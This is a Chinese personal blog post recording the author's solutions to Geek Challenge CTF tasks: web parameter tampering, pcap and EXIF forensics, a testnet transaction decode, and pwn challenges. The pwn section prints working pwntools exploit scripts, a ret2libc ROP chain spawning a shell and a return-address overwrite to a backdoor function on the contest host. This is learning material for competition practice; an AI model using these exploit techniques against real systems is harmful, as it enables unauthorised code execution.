<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>极客大挑战记录（截至10/30） | Lucky&#39;s blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="极客大挑战web1 阿里纳斯追乌龟 在古希腊，英雄阿基里斯和一只乌龟赛跑。阿基里斯的速度是乌龟的十倍。比赛开始时，乌龟在阿基里斯前面100米。芝诺悖论认为，当阿基里斯追到乌龟的出发点时，乌龟已经又向前爬了一段距离。当阿基里斯再追到那个位置时，乌龟又向前爬了。如此无限循环，阿基里斯似乎永远也追不上乌龟。他真的追不上吗？  解法：进入环境，会发现有一个追赶button, 用burpsuite抓包后得到">
<meta property="og:type" content="article">
<meta property="og:title" content="极客大挑战记录（截至10&#x2F;30）">
<meta property="og:url" content="http://example.com/2025/10/30/geek-challenge/index.html">
<meta property="og:site_name" content="Lucky&#39;s blog">
<meta property="og:description" content="极客大挑战web1 阿里纳斯追乌龟 在古希腊，英雄阿基里斯和一只乌龟赛跑。阿基里斯的速度是乌龟的十倍。比赛开始时，乌龟在阿基里斯前面100米。芝诺悖论认为，当阿基里斯追到乌龟的出发点时，乌龟已经又向前爬了一段距离。当阿基里斯再追到那个位置时，乌龟又向前爬了。如此无限循环，阿基里斯似乎永远也追不上乌龟。他真的追不上吗？  解法：进入环境，会发现有一个追赶button, 用burpsuite抓包后得到">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-10-31T02:20:00.000Z">
<meta property="article:modified_time" content="2025-10-30T14:20:19.368Z">
<meta property="article:author" content="lucky">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Lucky's blog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 8.1.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Lucky&#39;s blog</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">愿少年，乘风破浪，他日勿忘化雨功。</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives/">Archives</a>
        
          <a class="main-nav-link" href="/tags/">Tags</a>
        
          <a class="main-nav-link" href="/categories/">Categories</a>
        
          <a class="main-nav-link" href="/%5Bobject%20Object%5D">List</a>
        
          <a class="main-nav-link" href="/link/">Link</a>
        
          <a class="main-nav-link" href="/about/">About</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS 订阅"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="搜索"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="搜索"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-geek-challenge" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/10/30/geek-challenge/" class="article-date">
  <time class="dt-published" datetime="2025-10-31T02:20:00.000Z" itemprop="datePublished">2025-10-30</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      极客大挑战记录（截至10/30）
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="极客大挑战"><a href="#极客大挑战" class="headerlink" title="极客大挑战"></a>极客大挑战</h1><h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="1-阿里纳斯追乌龟"><a href="#1-阿里纳斯追乌龟" class="headerlink" title="1 阿里纳斯追乌龟"></a>1 阿里纳斯追乌龟</h3><blockquote>
<p>在古希腊，英雄阿基里斯和一只乌龟赛跑。阿基里斯的速度是乌龟的十倍。比赛开始时，乌龟在阿基里斯前面100米。<br>芝诺悖论认为，当阿基里斯追到乌龟的出发点时，乌龟已经又向前爬了一段距离。当阿基里斯再追到那个位置时，乌龟又向前爬了。如此无限循环，阿基里斯似乎永远也追不上乌龟。他真的追不上吗？</p>
</blockquote>
<p>解法：进入环境，会发现有一个追赶button, 用burpsuite抓包后得到一段 <em><strong>base64加密</strong></em> 的data, 解密后修改前面的值大于后面的值即可拿到flag。<br><br></p>
<h3 id="2"><a href="#2" class="headerlink" title="2"></a>2</h3><br>
<br>

<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="1-HTTP"><a href="#1-HTTP" class="headerlink" title="1 HTTP"></a>1 HTTP</h3><blockquote>
<p>管理员抓到一段可疑的流量，请从中还原被窃取的信息。</p>
</blockquote>
<p>解法：下载pcapng附件, 使用wireshark打开, 发现存在三个<em><strong>带有参数d, s, r的三个GET请求</strong></em> , 仔细观察可以发现d的参数是<em><strong>base64加密后的flag</strong></em>, 分别对U1lDe1JfVV9BXw&#x3D;&#x3D;, RjBSM05TMUM1, X01BU1RFUj99, 进行解码, 拼接后就是flag。<br><br></p>
<h3 id="2-🗃️🗃️"><a href="#2-🗃️🗃️" class="headerlink" title="2 🗃️🗃️"></a>2 🗃️🗃️</h3><blockquote>
<p>GSBP师傅在外出比赛结束后，打算到当地景点游览一番，他到了一个景点之后，感觉环境非常不错，<br>让人心旷神怡，于是拍了张图片发到了社交媒体。你是一名小黑客，你能找到他现在在哪里吗?<br>flag为SYC{城市_景点名称}<br>示例：SYC{成都市_武侯祠}</p>
</blockquote>
<p>解法：用<em><strong>exiftool</strong></em>查看png图片的GPS定位信息， 发现位于39 deg 52’ 47.32” N, 116 deg 23’ 58.36” E，直接用高德地图定位，得到北京市天坛公园。<br><br></p>
<h3 id="3-Blockchain-SignIn"><a href="#3-Blockchain-SignIn" class="headerlink" title="3 Blockchain SignIn"></a>3 Blockchain SignIn</h3><blockquote>
<p>奇怪的交易(sepolia testnet)：0x208e0465ea757073d0ec6af9094e5404ef81a213970eb580fa6a28a3af4669d6</p>
</blockquote>
<p>解法：去<em><strong>sepolia testnet</strong></em>上查询该单号，发现输入数据是0x5359437b773362335f67346d335f7374347274<br>7d，直接ascii码解密得到flag。<br><br><br><br></p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="1-old-rop"><a href="#1-old-rop" class="headerlink" title="1 old_rop"></a>1 old_rop</h3><blockquote>
<p>我以后再也不会遇到ret2csu了(惆怅)</p>
</blockquote>
<p>解法：题中可以<em><strong>控制rdi和rsi</strong></em>，先利用write_plt(1, write_got, 200) (200来自先前的read)，读取write的真实地址，然后利用libc.so.6文件当中的偏移计算出libc基址，再写入system(‘bin_sh’)即可。</p>
<h4 id="exp"><a href="#exp" class="headerlink" title="exp:"></a><strong>exp:</strong></h4><figure class="highlight python"><figcaption><span>&#123;.line-numbers&#125;</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch = <span class="string">&#x27;amd64&#x27;</span>, os = <span class="string">&#x27;linux&#x27;</span>, log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line"></span><br><span class="line">pop_rdi_addr = <span class="number">0x4012d3</span></span><br><span class="line">pop_rsi_r15_addr = <span class="number">0x4012d1</span></span><br><span class="line">write_plt = elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">write_got = elf.got[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">vuln_addr = <span class="number">0x401156</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;it !\x00\n&#x27;</span>)</span><br><span class="line">payload1 = <span class="string">b&#x27;a&#x27;</span> * <span class="number">136</span> + p64(pop_rdi_addr) + p64(<span class="number">1</span>) + p64(pop_rsi_r15_addr) + p64(write_got) + p64(<span class="number">1</span>) + p64(write_plt) + p64(vuln_addr)</span><br><span class="line">p.sendline(payload1)</span><br><span class="line"></span><br><span class="line">write_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">base = write_addr - <span class="number">0x11c560</span></span><br><span class="line">system_addr = base + <span class="number">0x58750</span></span><br><span class="line">bin_sh_addr = base + <span class="number">0x1cb42f</span></span><br><span class="line">ret_addr = <span class="number">0x40117A</span></span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span> * <span class="number">136</span> + p64(pop_rdi_addr) + p64(bin_sh_addr) + p64(ret_addr) + p64(system_addr)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<br>

<h3 id="2-Mission-Calculator"><a href="#2-Mission-Calculator" class="headerlink" title="2 Mission Calculator"></a>2 Mission Calculator</h3><blockquote>
<p>初次见面，特工。恭喜你在前些日子通过了考核，正式成为0Geek小组的一员。<br>这将是你Geek生涯的起点，作为新晋成员，你的导师Dr.K发布了一个算数任务，想要考察一下菜鸟们的数学能力。<br>我想这难不倒你，快去签个到吧。别作弊哦！</p>
</blockquote>
<p>解法：</p>
<ul>
<li>解法一：利用ctypes爆破随机数，较为繁琐，且50次操作的错误概率较大，故不采纳。</li>
<li>解法二：他会打印题目，直接爬下来后算就行了（python不好，让AI写了下脚本）。</li>
</ul>
<h4 id="exp："><a href="#exp：" class="headerlink" title="exp："></a><strong>exp：</strong></h4><figure class="highlight python"><figcaption><span>&#123;.line-numbers&#125;</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">solve_math_challenge</span>():</span><br><span class="line">    <span class="comment"># 连接设置</span></span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(sys.argv) &gt; <span class="number">1</span> <span class="keyword">and</span> sys.argv[<span class="number">1</span>] == <span class="string">&#x27;LOCAL&#x27;</span>:</span><br><span class="line">        io = process(<span class="string">&#x27;./math_challenge&#x27;</span>)  <span class="comment"># 替换为二进制文件路径</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        io = remote(<span class="string">&#x27;geek.ctfplus.cn&#x27;</span>, <span class="number">30522</span>)  <span class="comment"># 替换为实际主机和端口</span></span><br><span class="line">    io.recvuntil(<span class="string">&#x27;...\n&#x27;</span>)</span><br><span class="line">    io.send(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    <span class="comment"># 解决50道数学题</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">50</span>):</span><br><span class="line">        <span class="comment"># 接收问题行</span></span><br><span class="line">        io.recvuntil(<span class="string">b&#x27;Problem&#x27;</span>)</span><br><span class="line">        problem_line = io.recvuntil(<span class="string">b&#x27;= &#x27;</span>).decode()</span><br><span class="line">        full_problem = <span class="string">&quot;Problem&quot;</span> + problem_line</span><br><span class="line">        log.info(<span class="string">f&quot;Received: <span class="subst">&#123;full_problem.strip()&#125;</span>&quot;</span>)</span><br><span class="line">        </span><br><span class="line">        <span class="comment"># 使用正则表达式提取数字</span></span><br><span class="line">        <span class="keyword">match</span> = re.search(<span class="string">r&#x27;(\d+) \* (\d+) =&#x27;</span>, full_problem)</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">match</span>:</span><br><span class="line">            num1 = <span class="built_in">int</span>(<span class="keyword">match</span>.group(<span class="number">1</span>))</span><br><span class="line">            num2 = <span class="built_in">int</span>(<span class="keyword">match</span>.group(<span class="number">2</span>))</span><br><span class="line">            answer = num1 * num2</span><br><span class="line">            </span><br><span class="line">            <span class="comment"># 发送答案</span></span><br><span class="line">            io.sendline(<span class="built_in">str</span>(answer).encode())</span><br><span class="line">            log.success(<span class="string">f&quot;Sent: <span class="subst">&#123;num1&#125;</span> * <span class="subst">&#123;num2&#125;</span> = <span class="subst">&#123;answer&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            log.error(<span class="string">f&quot;Could not parse numbers from: <span class="subst">&#123;full_problem&#125;</span>&quot;</span>)</span><br><span class="line">            <span class="comment"># 如果正则失败，尝试简单分割</span></span><br><span class="line">            parts = full_problem.split()</span><br><span class="line">            <span class="keyword">for</span> j, part <span class="keyword">in</span> <span class="built_in">enumerate</span>(parts):</span><br><span class="line">                <span class="keyword">if</span> part == <span class="string">&#x27;*&#x27;</span> <span class="keyword">and</span> j &gt; <span class="number">0</span> <span class="keyword">and</span> j &lt; <span class="built_in">len</span>(parts)-<span class="number">1</span>:</span><br><span class="line">                    <span class="keyword">try</span>:</span><br><span class="line">                        num1 = <span class="built_in">int</span>(parts[j-<span class="number">1</span>])</span><br><span class="line">                        num2 = <span class="built_in">int</span>(parts[j+<span class="number">1</span>])</span><br><span class="line">                        answer = num1 * num2</span><br><span class="line">                        io.sendline(<span class="built_in">str</span>(answer).encode())</span><br><span class="line">                        log.success(<span class="string">f&quot;Sent (fallback): <span class="subst">&#123;num1&#125;</span> * <span class="subst">&#123;num2&#125;</span> = <span class="subst">&#123;answer&#125;</span>&quot;</span>)</span><br><span class="line">                        <span class="keyword">break</span></span><br><span class="line">                    <span class="keyword">except</span>:</span><br><span class="line">                        <span class="keyword">continue</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment"># 接收响应</span></span><br><span class="line">        response = io.recvline().decode().strip()</span><br><span class="line">        log.info(<span class="string">f&quot;Response: <span class="subst">&#123;response&#125;</span>&quot;</span>)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 接收最终消息</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        io.interactive()</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        log.info(<span class="string">&quot;Trying interactive mode...&quot;</span>)</span><br><span class="line">        io.interactive()</span><br><span class="line">    </span><br><span class="line">    io.close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    solve_math_challenge()</span><br></pre></td></tr></table></figure>

<br>

<h3 id="3-Mission-Cipher-Text"><a href="#3-Mission-Cipher-Text" class="headerlink" title="3 Mission Cipher Text"></a>3 Mission Cipher Text</h3><blockquote>
<p>别来无恙，特工！我知道你前些日子在Dr.K的测试上的事情了，别担心，&gt;Dr.K发觉了你惊人的天赋，现在你正式成为0Geek的高级特工了！<br>那么紧接着就是你的第一项任务：攻破“公司”的废弃节点。<br>仔细听任务简报：我们的其他特工曾经入侵过该节点，当时这个节点就已经因为未知原因被废弃了。不过最近我们丢失了该节点的控制权。测试发现这个节点现在【停止了一切对外访问】的活动，我们怀疑是有其他人入侵了这个节点。<br>特工，现在派遣你去确认情况，重新控制该节点。</p>
</blockquote>
<p>解法：先查看函数表，发现有<em><strong>backdoor函数</strong></em>，在菜单界面选择2后覆写返回地址（此处有栈对齐问题），发现程序把stdout close了，无法输出命令执行结果，此时可以在命令后加上<em><strong>1&gt;&amp;2</strong></em>，用stderr来输出执行结果，如<code>ls 1&gt;&amp;2</code>即可返回当前目录。</p>
<h4 id="exp-1"><a href="#exp-1" class="headerlink" title="**exp: **"></a>**exp: **</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">context(arch = &#x27;amd64&#x27;, os = &#x27;linux&#x27;, log_level = &#x27;debug&#x27;)</span><br><span class="line"></span><br><span class="line">#p = process(&#x27;./pwn&#x27;)</span><br><span class="line">p = remote(&#x27;geek.ctfplus.cn&#x27;, 32334)</span><br><span class="line">elf = ELF(&#x27;./pwn&#x27;)</span><br><span class="line"></span><br><span class="line">backdoor_addr = 0x4014AB</span><br><span class="line">ret_addr = 0x40101a</span><br><span class="line">p.recvuntil(&#x27;choice &gt; &#x27;)</span><br><span class="line">p.sendline(b&#x27;2&#x27;)</span><br><span class="line"></span><br><span class="line">p.recvuntil(&#x27;feedback:\n&#x27;)</span><br><span class="line">payload = b&#x27;a&#x27; * 40 + p64(ret_addr) + p64(backdoor_addr)</span><br><span class="line"></span><br><span class="line">#gdb.attach(p)</span><br><span class="line">pause()</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="4"><a href="#4" class="headerlink" title="4"></a>4</h3>
      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2025/10/30/geek-challenge/" data-id="cuid4gehROqMAw9xbC6swo3Pd" data-title="极客大挑战记录（截至10/30）" class="article-share-link"><span class="fa fa-share">分享</span></a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2025/10/30/first_blog/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">后一篇</strong>
      <div class="article-nav-title">我的第一篇博客</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/ctf/" style="font-size: 10px;">ctf</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/10/">十月 2025</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/10/30/geek-challenge/">极客大挑战记录（截至10/30）</a>
          </li>
        
          <li>
            <a href="/2025/10/30/first_blog/">我的第一篇博客</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 lucky<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives/" class="mobile-nav-link">Archives</a>
  
    <a href="/tags/" class="mobile-nav-link">Tags</a>
  
    <a href="/categories/" class="mobile-nav-link">Categories</a>
  
    <a href="/%5Bobject%20Object%5D" class="mobile-nav-link">List</a>
  
    <a href="/link/" class="mobile-nav-link">Link</a>
  
    <a href="/about/" class="mobile-nav-link">About</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>